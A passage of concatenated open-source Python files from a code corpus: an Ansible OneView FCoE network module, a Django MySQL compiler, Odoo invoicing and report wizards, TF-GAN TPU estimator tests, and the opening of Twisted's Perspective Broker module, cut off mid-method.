ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: oneview_fcoe_network
short_description: Manage OneView FCoE Network resources
description:
- Provides an interface to manage FCoE Network resources. Can create, update, or delete.
version_added: "2.4"
requirements:
- "python >= 2.7.9"
- "hpOneView >= 4.0.0"
author: "Felipe Bulsoni (@fgbulsoni)"
options:
state:
description:
- Indicates the desired state for the FCoE Network resource.
C(present) will ensure data properties are compliant with OneView.
C(absent) will remove the resource from OneView, if it exists.
default: present
choices: ['present', 'absent']
data:
description:
- List with FCoE Network properties.
required: true
extends_documentation_fragment:
- oneview
- oneview.validateetag
'''
EXAMPLES = '''
- name: Ensure that FCoE Network is present using the default configuration
oneview_fcoe_network:
config: '/etc/oneview/oneview_config.json'
state: present
data:
name: Test FCoE Network
vlanId: 201
delegate_to: localhost
- name: Update the FCOE network scopes
oneview_fcoe_network:
config: '/etc/oneview/oneview_config.json'
state: present
data:
name: New FCoE Network
scopeUris:
- '/rest/scopes/00SC123456'
- '/rest/scopes/01SC123456'
delegate_to: localhost
- name: Ensure that FCoE Network is absent
oneview_fcoe_network:
config: '/etc/oneview/oneview_config.json'
state: absent
data:
name: New FCoE Network
delegate_to: localhost
'''
RETURN = '''
fcoe_network:
description: Has the facts about the OneView FCoE Networks.
returned: On state 'present'. Can be null.
type: dict
'''
from ansible.module_utils.oneview import OneViewModuleBase
class FcoeNetworkModule(OneViewModuleBase):
MSG_CREATED = 'FCoE Network created successfully.'
MSG_UPDATED = 'FCoE Network updated successfully.'
MSG_DELETED = 'FCoE Network deleted successfully.'
MSG_ALREADY_PRESENT = 'FCoE Network is already present.'
MSG_ALREADY_ABSENT = 'FCoE Network is already absent.'
RESOURCE_FACT_NAME = 'fcoe_network'
def __init__(self):
additional_arg_spec = dict(data=dict(required=True, type='dict'),
state=dict(default='present',
choices=['present', 'absent']))
super(FcoeNetworkModule, self).__init__(additional_arg_spec=additional_arg_spec,
validate_etag_support=True)
self.resource_client = self.oneview_client.fcoe_networks
def execute_module(self):
resource = self.get_by_name(self.data.get('name'))
if self.state == 'present':
return self.__present(resource)
elif self.state == 'absent':
return self.resource_absent(resource)
def __present(self, resource):
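        # scopeUris are not part of the FCoE network payload itself: pop them,
        # ensure the resource is present, then patch the scopes separately.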
scope_uris = self.data.pop('scopeUris', None)
result = self.resource_present(resource, self.RESOURCE_FACT_NAME)
if scope_uris is not None:
result = self.resource_scopes_set(result, 'fcoe_network', scope_uris)
return result
def main():
FcoeNetworkModule().run()
if __name__ == '__main__':
main()
|
loic/django | refs/heads/master | django/db/backends/mysql/compiler.py | 691 | from django.db.models.sql import compiler
class SQLCompiler(compiler.SQLCompiler):
def as_subquery_condition(self, alias, columns, compiler):
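        # Compile this query and wrap it so the given columns are matched
        # against it with a row-value IN clause, e.g.
        # (alias.col1, alias.col2) IN (SELECT ...).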
qn = compiler.quote_name_unless_alias
qn2 = self.connection.ops.quote_name
sql, params = self.as_sql()
return '(%s) IN (%s)' % (', '.join('%s.%s' % (qn(alias), qn2(column)) for column in columns), sql), params
class SQLInsertCompiler(compiler.SQLInsertCompiler, SQLCompiler):
pass
class SQLDeleteCompiler(compiler.SQLDeleteCompiler, SQLCompiler):
pass
class SQLUpdateCompiler(compiler.SQLUpdateCompiler, SQLCompiler):
pass
class SQLAggregateCompiler(compiler.SQLAggregateCompiler, SQLCompiler):
pass
|
sysadminmatmoz/odoo-clearcorp | refs/heads/8.0 | purchase_delivery_invoice/wizard/stock_invoice_onshipping.py | 1 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Addons modules by CLEARCORP S.A.
# Copyright (C) 2009-TODAY CLEARCORP S.A. (<http://clearcorp.co.cr>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import osv, fields
from openerp.tools.translate import _
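# Maps (picking type code, counterpart location usage) to the journal types
# that may be used when invoicing the picking, e.g. an incoming picking from a
# supplier location is invoiced through a 'purchase' journal.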
JOURNAL_TYPE_MAP = {
('outgoing', 'customer'): ['sale'],
('outgoing', 'supplier'): ['purchase_refund'],
('outgoing', 'transit'): ['sale', 'purchase_refund'],
('incoming', 'supplier'): ['purchase'],
('incoming', 'customer'): ['sale_refund'],
('incoming', 'transit'): ['purchase', 'sale_refund'],
}
class stock_invoice_onshipping(osv.osv_memory):
_name = 'stock.invoice.onshipping.delivery'
def _get_journal(self, cr, uid, context=None):
journal_obj = self.pool.get('account.journal')
journal_type = self._get_journal_type(cr, uid, context=context)
journals = journal_obj.search(cr, uid, [('type', '=', journal_type)])
return journals and journals[0] or False
def _get_journal_type(self, cr, uid, context=None):
if context is None:
context = {}
res_ids = context and context.get('active_ids', [])
pick_obj = self.pool.get('stock.picking')
pickings = pick_obj.browse(cr, uid, res_ids, context=context)
pick = pickings and pickings[0]
if not pick or not pick.move_lines:
return 'sale'
type = pick.picking_type_id.code
usage = pick.move_lines[0].location_id.usage if type == 'incoming' \
else pick.move_lines[0].location_dest_id.usage
return JOURNAL_TYPE_MAP.get((type, usage), ['sale'])[0]
_columns = {
'journal_id': fields.many2one('account.journal', 'Destination Journal',
required=True),
'journal_type': fields.selection(
[('purchase_refund', 'Refund Purchase'),
('purchase', 'Create Supplier Invoice'),
('sale_refund', 'Refund Sale'), ('sale',
'Create Customer Invoice')], 'Journal Type', readonly=True),
'group': fields.boolean("Group by partner"),
'invoice_date': fields.date('Invoice Date'),
}
_defaults = {
'journal_type': _get_journal_type,
'journal_id': _get_journal,
}
def onchange_journal_id(self, cr, uid, ids, journal_id, context=None):
if context is None:
context = {}
domain = {}
value = {}
active_id = context.get('active_id')
if active_id:
picking = self.pool['stock.picking'].browse(cr, uid, active_id,
context=context)
type = picking.picking_type_id.code
usage = picking.move_lines[0].location_id.usage if type == \
'incoming' else picking.move_lines[0].location_dest_id.usage
journal_types = JOURNAL_TYPE_MAP.get(
(type, usage), ['sale', 'purchase', 'sale_refund',
'purchase_refund'])
domain['journal_id'] = [('type', 'in', journal_types)]
if journal_id:
journal = self.pool['account.journal'].browse(cr, uid, journal_id,
context=context)
value['journal_type'] = journal.type
return {'value': value, 'domain': domain}
def view_init(self, cr, uid, fields_list, context=None):
if context is None:
context = {}
res = super(stock_invoice_onshipping, self).view_init(
cr, uid, fields_list, context=context)
pick_obj = self.pool.get('stock.picking')
count = 0
active_ids = context.get('active_ids', [])
for pick in pick_obj.browse(cr, uid, active_ids, context=context):
if pick.invoice_state != 'invoiced' and \
pick.carrier_invoice_control != '2binvoiced':
count += 1
if len(active_ids) == count:
raise osv.except_osv(_('Warning!'), _(
'None of these picking lists require invoicing.'))
return res
def open_invoice(self, cr, uid, ids, context=None):
if context is None:
context = {}
invoice_ids = self.create_invoice(cr, uid, ids, context=context)
if not invoice_ids:
raise osv.except_osv(_('Error!'), _('No invoice created!'))
data = self.browse(cr, uid, ids[0], context=context)
action = {}
journal2type = {'sale': 'out_invoice', 'purchase': 'in_invoice',
'sale_refund': 'out_refund',
'purchase_refund': 'in_refund'}
inv_type = journal2type.get(data.journal_type) or 'out_invoice'
data_pool = self.pool.get('ir.model.data')
if inv_type == "out_invoice":
action_id = data_pool.xmlid_to_res_id(
cr, uid, 'account.action_invoice_tree1')
elif inv_type == "in_invoice":
action_id = data_pool.xmlid_to_res_id(
cr, uid, 'account.action_invoice_tree2')
elif inv_type == "out_refund":
action_id = data_pool.xmlid_to_res_id(
cr, uid, 'account.action_invoice_tree3')
elif inv_type == "in_refund":
action_id = data_pool.xmlid_to_res_id(
cr, uid, 'account.action_invoice_tree4')
if action_id:
action_pool = self.pool['ir.actions.act_window']
action = action_pool.read(cr, uid, action_id, context=context)
action['domain'] = "[('id','in', ["+','.join(map(
str, invoice_ids))+"])]"
return action
return True
def create_invoice(self, cr, uid, ids, context=None):
context = dict(context or {})
data = self.browse(cr, uid, ids[0], context=context)
journal2type = {'sale': 'out_invoice', 'purchase': 'in_invoice',
'sale_refund': 'out_refund',
'purchase_refund': 'in_refund'}
context['date_inv'] = data.invoice_date
inv_type = journal2type.get(data.journal_type) or 'out_invoice'
context['inv_type'] = inv_type
active_ids = context.get('active_ids', [])
res = self.action_invoice_create_purchase_delivery(
cr, uid, active_ids, journal_id=data.journal_id.id,
group=data.group, type=inv_type, context=context)
return res
def action_invoice_create_purchase_delivery(
self, cr, uid, ids, journal_id, group=False, type='out_invoice',
            context=None):
        """ Creates invoices based on the invoice state selected for the pickings.
        @param journal_id: Id of the journal
        @param group: Whether to create a grouped invoice or not
        @param type: Type of invoice to be created
        @return: Ids of the created invoices for the pickings
        """
picking_obj = self.pool.get('stock.picking')
context = context or {}
todo = {}
delivery_partner = {}
for picking in picking_obj.browse(cr, uid, ids, context=context):
if not picking.carrier_id:
raise Warning(_('The carrier is not set for this picking %s')
% picking.name)
partner = picking.carrier_id.partner_id.id
delivery_partner = picking.carrier_id.partner_id
# grouping is based on the invoiced partner
if group:
key = partner
else:
key = picking.id
for move in picking.move_lines:
if move.invoice_state == 'invoiced':
if (move.state != 'cancel') and not move.scrapped:
todo.setdefault(key, [])
todo[key].append(move)
invoices = []
ctx = context.copy()
ctx['partner_delivery'] = delivery_partner
ctx['invoice_delivery'] = True
for moves in todo.values():
invoices += picking_obj._invoice_create_line(
cr, uid, moves, journal_id, type, context=ctx)
return invoices
|
thisisshi/cloud-custodian | refs/heads/master | tests/data/__init__.py | 37 | # Copyright The Cloud Custodian Authors.
# SPDX-License-Identifier: Apache-2.0
|
odooindia/odoo | refs/heads/master | addons/account/wizard/account_report_central_journal.py | 378 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
class account_central_journal(osv.osv_memory):
_name = 'account.central.journal'
_description = 'Account Central Journal'
_inherit = "account.common.journal.report"
_columns = {
'journal_ids': fields.many2many('account.journal', 'account_central_journal_journal_rel', 'account_id', 'journal_id', 'Journals', required=True),
}
def _print_report(self, cr, uid, ids, data, context=None):
data = self.pre_print_report(cr, uid, ids, data, context=context)
return self.pool['report'].get_action(cr, uid, [], 'account.report_centraljournal', data=data, context=context)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
ageron/tensorflow | refs/heads/master | tensorflow/contrib/gan/python/estimator/python/tpu_gan_estimator_test.py | 7 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for TF-GAN's TPU Estimator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import tempfile
from absl.testing import parameterized
import numpy as np
from tensorflow.contrib import layers
from tensorflow.contrib.gan.python import namedtuples as tfgan_tuples
from tensorflow.contrib.gan.python.estimator.python import tpu_gan_estimator_impl as estimator
from tensorflow.contrib.gan.python.losses.python import tuple_losses as losses
from tensorflow.contrib.tpu.python.tpu import tpu_config
from tensorflow.contrib.tpu.python.tpu import tpu_estimator
from tensorflow.contrib.tpu.python.tpu import tpu_optimizer
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.estimator import model_fn as model_fn_lib
from tensorflow.python.estimator.estimator import WarmStartSettings
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework.errors_impl import NotFoundError
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import metrics as metrics_lib
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import flags
from tensorflow.python.platform import test
from tensorflow.python.summary.writer import writer_cache
from tensorflow.python.training import learning_rate_decay
from tensorflow.python.training import training
from tensorflow.python.training import training_util
FLAGS = flags.FLAGS
flags.DEFINE_bool('use_tpu', False, 'Whether to run test on TPU or not.')
def generator_fn(noise, mode):
del mode
return layers.fully_connected(noise, tensor_shape.dimension_value(
noise.shape[1]))
def discriminator_fn(data, unused_conditioning, mode):
del unused_conditioning, mode
return layers.fully_connected(data, 1)
def get_dummy_gan_model():
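  # Builds a minimal GANModel by hand: the discriminator outputs depend on two
  # dummy variables so the generated train ops have parameters to update.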
# TODO(joelshor): Find a better way of creating a variable scope.
with variable_scope.variable_scope('generator') as gen_scope:
gen_var = variable_scope.get_variable('dummy_var', initializer=0.0)
with variable_scope.variable_scope('discriminator') as dis_scope:
dis_var = variable_scope.get_variable('dummy_var', initializer=0.0)
return tfgan_tuples.GANModel(
generator_inputs=None,
generated_data=array_ops.ones([3, 4]),
generator_variables=[gen_var],
generator_scope=gen_scope,
generator_fn=None,
real_data=array_ops.zeros([3, 4]),
discriminator_real_outputs=array_ops.ones([1, 2, 3]) * dis_var,
discriminator_gen_outputs=array_ops.ones([1, 2, 3]) * gen_var * dis_var,
discriminator_variables=[dis_var],
discriminator_scope=dis_scope,
discriminator_fn=None)
def get_metrics(generator_inputs, generated_data, real_data,
discriminator_real_outputs, discriminator_gen_outputs):
del generator_inputs, discriminator_real_outputs, discriminator_gen_outputs
return {
'mse_custom_metric': metrics_lib.mean_squared_error(
real_data, generated_data)
}
class GetTPUEstimatorSpecTest(test.TestCase, parameterized.TestCase):
"""Tests that the EstimatorSpec is constructed appropriately."""
@classmethod
def setUpClass(cls):
super(GetTPUEstimatorSpecTest, cls).setUpClass()
cls._generator_optimizer = tpu_optimizer.CrossShardOptimizer(
training.GradientDescentOptimizer(1.0))
cls._discriminator_optimizer = tpu_optimizer.CrossShardOptimizer(
training.GradientDescentOptimizer(1.0))
@parameterized.named_parameters(
('joint_train', model_fn_lib.ModeKeys.TRAIN, True),
('train_sequential', model_fn_lib.ModeKeys.TRAIN, False),
('eval', model_fn_lib.ModeKeys.EVAL, None),
('predict', model_fn_lib.ModeKeys.PREDICT, None))
def test_get_estimator_spec(self, mode, joint_train):
with ops.Graph().as_default():
self._gan_model = get_dummy_gan_model()
spec = estimator._get_estimator_spec(
mode,
self._gan_model,
generator_loss_fn=losses.wasserstein_generator_loss,
discriminator_loss_fn=losses.wasserstein_discriminator_loss,
get_eval_metric_ops_fn=get_metrics,
generator_optimizer=self._generator_optimizer,
discriminator_optimizer=self._discriminator_optimizer,
joint_train=joint_train,
is_on_tpu=FLAGS.use_tpu,
gan_train_steps=tfgan_tuples.GANTrainSteps(1, 1))
self.assertIsInstance(spec, tpu_estimator.TPUEstimatorSpec)
self.assertEqual(mode, spec.mode)
if mode == model_fn_lib.ModeKeys.PREDICT:
self.assertEqual({'generated_data': self._gan_model.generated_data},
spec.predictions)
elif mode == model_fn_lib.ModeKeys.TRAIN:
self.assertShapeEqual(np.array(0), spec.loss) # must be a scalar
self.assertIsNotNone(spec.train_op)
self.assertIsNotNone(spec.training_hooks)
elif mode == model_fn_lib.ModeKeys.EVAL:
self.assertEqual(self._gan_model.generated_data, spec.predictions)
self.assertShapeEqual(np.array(0), spec.loss) # must be a scalar
self.assertIsNotNone(spec.eval_metrics)
class TPUGANEstimatorIntegrationTest(test.TestCase, parameterized.TestCase):
def setUp(self):
super(TPUGANEstimatorIntegrationTest, self).setUp()
self._model_dir = tempfile.mkdtemp()
self._config = tpu_config.RunConfig(model_dir=self._model_dir)
def tearDown(self):
super(TPUGANEstimatorIntegrationTest, self).tearDown()
if self._model_dir:
writer_cache.FileWriterCache.clear()
shutil.rmtree(self._model_dir)
def _test_complete_flow(
self, train_input_fn, eval_input_fn, predict_input_fn, prediction_size,
lr_decay=False, joint_train=True):
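    # End-to-end flow: build a TPUGANEstimator, train for a few steps, run
    # evaluation (the reported loss should equal generator + discriminator
    # loss) and finally predict, checking the shape of the generated data.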
def make_opt():
gstep = training_util.get_or_create_global_step()
lr = learning_rate_decay.exponential_decay(1.0, gstep, 10, 0.9)
return training.GradientDescentOptimizer(lr)
gopt = make_opt if lr_decay else training.GradientDescentOptimizer(1.0)
dopt = make_opt if lr_decay else training.GradientDescentOptimizer(1.0)
est = estimator.TPUGANEstimator(
generator_fn=generator_fn,
discriminator_fn=discriminator_fn,
generator_loss_fn=losses.wasserstein_generator_loss,
discriminator_loss_fn=losses.wasserstein_discriminator_loss,
generator_optimizer=gopt,
discriminator_optimizer=dopt,
joint_train=joint_train,
get_eval_metric_ops_fn=get_metrics,
train_batch_size=4,
eval_batch_size=10,
predict_batch_size=8,
use_tpu=FLAGS.use_tpu,
config=self._config)
# Train.
num_steps_train = 10
est.train(train_input_fn, steps=num_steps_train)
# Evaluate.
num_steps_eval = 2
scores = est.evaluate(eval_input_fn, steps=num_steps_eval)
self.assertIn(ops.GraphKeys.GLOBAL_STEP, scores)
self.assertIn('loss', scores)
self.assertEqual(scores['discriminator_loss'] + scores['generator_loss'],
scores['loss'])
self.assertIn('mse_custom_metric', scores)
# Predict.
predictions = np.array([x['generated_data'] for x in
est.predict(predict_input_fn)])
self.assertAllEqual(prediction_size, predictions.shape)
@parameterized.named_parameters(
('joint_train', True, False, False),
('train_sequential', False, False, False),
('lr_decay', False, True, False),
('train_sequential_ds', False, False, True))
def test_numpy_input_fn(self, joint_train, lr_decay, return_ds):
"""Tests complete flow with numpy_input_fn."""
input_dim = 4
def train_input_fn(params):
data = np.zeros([input_dim], dtype=np.float32)
ds = (dataset_ops.Dataset
.from_tensors((data, data))
.repeat()
.batch(params['batch_size'], drop_remainder=True))
if return_ds:
return ds
else:
x, y = ds.make_one_shot_iterator().get_next()
return x, y
def eval_input_fn(params):
data = np.zeros([input_dim], dtype=np.float32)
ds = (dataset_ops.Dataset
.from_tensors((data, data))
.repeat()
.batch(params['batch_size'], drop_remainder=True))
if return_ds:
return ds
else:
x, y = ds.make_one_shot_iterator().get_next()
return x, y
predict_size = 10
def predict_input_fn(params):
del params # unused
data = np.zeros([input_dim], dtype=np.float32)
ds = (dataset_ops.Dataset
.from_tensors(data)
.repeat(predict_size)
.batch(1, drop_remainder=True))
return ds
self._test_complete_flow(
train_input_fn=train_input_fn,
eval_input_fn=eval_input_fn,
predict_input_fn=predict_input_fn,
prediction_size=[predict_size, input_dim],
lr_decay=lr_decay,
joint_train=joint_train)
class TPUGANEstimatorWarmStartTest(test.TestCase):
def setUp(self):
self._model_dir = self.get_temp_dir()
self._config = tpu_config.RunConfig(model_dir=self._model_dir)
self.new_variable_name = 'new_var'
self.new_variable_value = [1.0, 2.0, 3.0]
def tearDown(self):
writer_cache.FileWriterCache.clear()
def _test_warm_start(self, warm_start_from=None):
"""Tests whether WarmStartSettings work as intended."""
def generator_with_new_variable(noise_dict, mode):
variable_scope.get_variable(name=self.new_variable_name,
initializer=self.new_variable_value,
trainable=True)
return generator_fn(noise_dict, mode)
est = estimator.TPUGANEstimator(
generator_fn=generator_fn,
discriminator_fn=discriminator_fn,
generator_loss_fn=losses.wasserstein_generator_loss,
discriminator_loss_fn=losses.wasserstein_discriminator_loss,
generator_optimizer=training.GradientDescentOptimizer(1.0),
discriminator_optimizer=training.GradientDescentOptimizer(1.0),
train_batch_size=4,
use_tpu=FLAGS.use_tpu,
config=self._config)
def train_input_fn(params):
data = np.zeros([params['batch_size'], 4], dtype=np.float32)
return data, data
est.train(train_input_fn, steps=1)
est_warm = estimator.TPUGANEstimator(
generator_fn=generator_with_new_variable,
discriminator_fn=discriminator_fn,
generator_loss_fn=losses.wasserstein_generator_loss,
discriminator_loss_fn=losses.wasserstein_discriminator_loss,
generator_optimizer=training.GradientDescentOptimizer(1.0),
discriminator_optimizer=training.GradientDescentOptimizer(1.0),
config=tpu_config.RunConfig(
model_dir=None if warm_start_from else self._model_dir),
train_batch_size=4,
use_tpu=FLAGS.use_tpu,
warm_start_from=warm_start_from)
est_warm.train(train_input_fn, steps=1)
return est_warm
def test_warm_start_error(self):
"""Test if exception when reloading different estimators."""
with self.assertRaises(NotFoundError):
self._test_warm_start()
def test_warm_start_success(self):
"""Test if GANEstimator allows explicit warm start variable assignment."""
# Regex matches all variable names in ckpt except for new_var.
var_regex = '^(?!.*%s.*)' % self.new_variable_name
warmstart = WarmStartSettings(ckpt_to_initialize_from=self._model_dir,
vars_to_warm_start=var_regex)
est_warm = self._test_warm_start(warm_start_from=warmstart)
full_variable_name = 'Generator/%s' % self.new_variable_name
self.assertIn(full_variable_name, est_warm.get_variable_names())
equal_vals = np.array_equal(est_warm.get_variable_value(full_variable_name),
self.new_variable_value)
self.assertTrue(equal_vals)
if __name__ == '__main__':
test.main()
|
kohnle-lernmodule/exe201based | refs/heads/master | twisted/spread/pb.py | 14 | # -*- test-case-name: twisted.test.test_pb -*-
#
# Copyright (c) 2001-2004 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Perspective Broker
\"This isn\'t a professional opinion, but it's probably got enough
internet to kill you.\" --glyph
Stability: semi-stable
Future Plans: The connection APIs will be extended with support for
URLs, that will be able to extend resource location and discovery
conversations and specify different authentication mechanisms besides
username/password. This should only add to, and not change, the
existing protocol.
Important Changes
=================
New APIs have been added for serving and connecting. On the client
side, use PBClientFactory.getPerspective() instead of connect(), and
PBClientFactory.getRootObject() instead of getObjectAt(). Server side
should switch to updated cred APIs by using PBServerFactory, at which
point clients would switch to PBClientFactory.login().
The new cred support means a different method is sent for login,
although the protocol is compatible on the binary level. When we
switch to pluggable credentials this will introduce another change,
although the current change will still be supported.
The Perspective class is now deprecated, and has been replaced with
Avatar, which does not rely on the old cred APIs.
Introduction
============
This is a broker for proxies for and copies of objects. It provides a
translucent interface layer to those proxies.
The protocol is not opaque, because it provides objects which
represent the remote proxies and require no context (server
references, IDs) to operate on.
It is not transparent because it does I{not} attempt to make remote
objects behave identically, or even similarly, to local objects.
Method calls are invoked asynchronously, and specific rules are
applied when serializing arguments.
@author: U{Glyph Lefkowitz<mailto:[email protected]>}
"""
__version__ = "$Revision: 1.157 $"[11:-2]
# System Imports
try:
import cStringIO as StringIO
except ImportError:
import StringIO
import sys
import types
import warnings
# Twisted Imports
from twisted.python import log, failure, components, reflect
from twisted.internet import reactor, defer, protocol, error
from twisted.cred import authorizer, service, perspective, identity
from twisted.cred.portal import Portal
from twisted.persisted import styles
from twisted.python.components import Interface, registerAdapter, backwardsCompatImplements
from zope.interface import implements
# Sibling Imports
from twisted.spread.interfaces import IJellyable, IUnjellyable
from jelly import jelly, unjelly, globalSecurity
import banana
# Tightly coupled sibling import
from flavors import Serializable
from flavors import Referenceable, NoSuchMethod
from flavors import Root, IPBRoot
from flavors import ViewPoint
from flavors import Viewable
from flavors import Copyable
from flavors import Jellyable
from flavors import Cacheable
from flavors import RemoteCopy
from flavors import RemoteCache
from flavors import RemoteCacheObserver
from flavors import copyTags
from flavors import setCopierForClass, setUnjellyableForClass
from flavors import setFactoryForClass
from flavors import setCopierForClassTree
MAX_BROKER_REFS = 1024
portno = 8787
class ProtocolError(Exception):
"""
This error is raised when an invalid protocol statement is received.
"""
class DeadReferenceError(ProtocolError):
"""
This error is raised when a method is called on a dead reference (one whose
broker has been disconnected).
"""
class Error(Exception):
"""
This error can be raised to generate known error conditions.
When a PB callable method (perspective_, remote_, view_) raises
this error, it indicates that a traceback should not be printed,
but instead, the string representation of the exception should be
sent.
"""
class RemoteMethod:
"""This is a translucent reference to a remote message.
"""
def __init__(self, obj, name):
"""Initialize with a L{RemoteReference} and the name of this message.
"""
self.obj = obj
self.name = name
def __cmp__(self, other):
return cmp((self.obj, self.name), other)
def __hash__(self):
return hash((self.obj, self.name))
def __call__(self, *args, **kw):
"""Asynchronously invoke a remote method.
"""
return self.obj.broker._sendMessage('',self.obj.perspective, self.obj.luid, self.name, args, kw)
def noOperation(*args, **kw):
"""Do nothing.
Neque porro quisquam est qui dolorem ipsum quia dolor sit amet,
consectetur, adipisci velit...
"""
class PBConnectionLost(Exception):
pass
def printTraceback(tb):
"""Print a traceback (string) to the standard log.
"""
log.msg('Perspective Broker Traceback:' )
log.msg(tb)
class IPerspective(Interface):
"""
per*spec*tive, n. : The relationship of aspects of a subject to each
other and to a whole: 'a perspective of history'; 'a need to view
the problem in the proper perspective'.
This is a Perspective Broker-specific wrapper for an avatar. That
is to say, a PB-published view on to the business logic for the
system's concept of a 'user'.
The concept of attached/detached is no longer implemented by the
framework. The realm is expected to implement such semantics if
needed.
"""
def perspectiveMessageReceived(self, broker, message, args, kwargs):
"""
This method is called when a network message is received.
@arg broker: The Perspective Broker.
@type message: str
@arg message: The name of the method called by the other end.
@type args: list in jelly format
@arg args: The arguments that were passed by the other end. It
            is recommended that you use the `unserialize' method of the
broker to decode this.
@type kwargs: dict in jelly format
@arg kwargs: The keyword arguments that were passed by the
other end. It is recommended that you use the
`unserialize' method of the broker to decode this.
@rtype: A jelly list.
@return: It is recommended that you use the `serialize' method
of the broker on whatever object you need to return to
generate the return value.
"""
class Avatar:
"""A default IPerspective implementor.
This class is intended to be subclassed, and a realm should return
an instance of such a subclass when IPerspective is requested of
it.
A peer requesting a perspective will receive only a
L{RemoteReference} to a pb.Avatar. When a method is called on
that L{RemoteReference}, it will translate to a method on the
remote perspective named 'perspective_methodname'. (For more
information on invoking methods on other objects, see
L{flavors.ViewPoint}.)
"""
implements(IPerspective)
def perspectiveMessageReceived(self, broker, message, args, kw):
"""This method is called when a network message is received.
I will call::
| self.perspective_%(message)s(*broker.unserialize(args),
| **broker.unserialize(kw))
to handle the method; subclasses of Avatar are expected to
implement methods of this naming convention.
"""
args = broker.unserialize(args, self)
kw = broker.unserialize(kw, self)
method = getattr(self, "perspective_%s" % message)
try:
state = method(*args, **kw)
except TypeError:
log.msg("%s didn't accept %s and %s" % (method, args, kw))
raise
return broker.serialize(state, self, method, args, kw)
components.backwardsCompatImplements(Avatar)
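# Editor's sketch (the avatar class and method names are hypothetical): the
# perspective_* naming convention documented above -- a realm returns an Avatar
# subclass, and a client calling perspective.callRemote("echo", text) on its
# RemoteReference is dispatched to perspective_echo on that avatar.
#
#     class EchoAvatar(Avatar):
#         def perspective_echo(self, text):
#             return text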
class Perspective(perspective.Perspective, Avatar):
"""
This class is DEPRECATED, because it relies on old cred
APIs. Please use L{Avatar}.
"""
def brokerAttached(self, reference, identity, broker):
"""An intermediary method to override.
Normally you will want to use 'attached', as described in
L{twisted.cred.perspective.Perspective}.attached; however, this method
serves the same purpose, and in some circumstances, you are sure that
the protocol that objects will be attaching to your Perspective with is
Perspective Broker, and in that case you may wish to get the Broker
object they are connecting with, for example, to determine what host
they are connecting from. Bear in mind that when overriding this
method, other, non-PB protocols will not notify you of being attached
or detached.
"""
warnings.warn("pb.Perspective is deprecated, please use pb.Avatar.", DeprecationWarning, 2)
return self.attached(reference, identity)
def brokerDetached(self, reference, identity, broker):
"""See L{brokerAttached}.
"""
return self.detached(reference, identity)
class Service(service.Service):
"""A service for Perspective Broker.
This class is DEPRECATED, because it relies on old cred APIs.
On this Service, the result of a perspective request must be a
L{pb.Perspective} rather than a L{twisted.cred.perspective.Perspective}.
"""
perspectiveClass = Perspective
class AsReferenceable(Referenceable):
"""AsReferenceable: a reference directed towards another object.
"""
def __init__(self, object, messageType="remote"):
"""Initialize me with an object.
"""
self.remoteMessageReceived = getattr(object, messageType + "MessageReceived")
class RemoteReference(Serializable, styles.Ephemeral):
"""This is a translucent reference to a remote object.
I may be a reference to a L{flavors.ViewPoint}, a
L{flavors.Referenceable}, or an L{IPerspective} implementor (e.g.,
pb.Avatar). From the client's perspective, it is not possible to
tell which except by convention.
I am a \"translucent\" reference because although no additional
bookkeeping overhead is given to the application programmer for
manipulating a reference, return values are asynchronous.
See also L{twisted.internet.defer}.
@ivar broker: The broker I am obtained through.
@type broker: L{Broker}
"""
implements(IUnjellyable)
def __init__(self, perspective, broker, luid, doRefCount):
"""(internal) Initialize me with a broker and a locally-unique ID.
The ID is unique only to the particular Perspective Broker
instance.
"""
self.luid = luid
self.broker = broker
self.doRefCount = doRefCount
self.perspective = perspective
self.disconnectCallbacks = []
def notifyOnDisconnect(self, callback):
"""Register a callback to be called if our broker gets disconnected.
This callback will be called with one argument, this instance.
"""
assert callable(callback)
self.disconnectCallbacks.append(callback)
if len(self.disconnectCallbacks) == 1:
self.broker.notifyOnDisconnect(self._disconnected)
def dontNotifyOnDisconnect(self, callback):
"""Remove a callback that was registered with notifyOnDisconnect."""
self.disconnectCallbacks.remove(callback)
if not self.disconnectCallbacks:
self.broker.dontNotifyOnDisconnect(self._disconnected)
def _disconnected(self):
"""Called if we are disconnected and have callbacks registered."""
for callback in self.disconnectCallbacks:
callback(self)
self.disconnectCallbacks = None
def jellyFor(self, jellier):
"""If I am being sent back to where I came from, serialize as a local backreference.
"""
if jellier.invoker:
assert self.broker == jellier.invoker, "Can't send references to brokers other than their own."
return "local", self.luid
else:
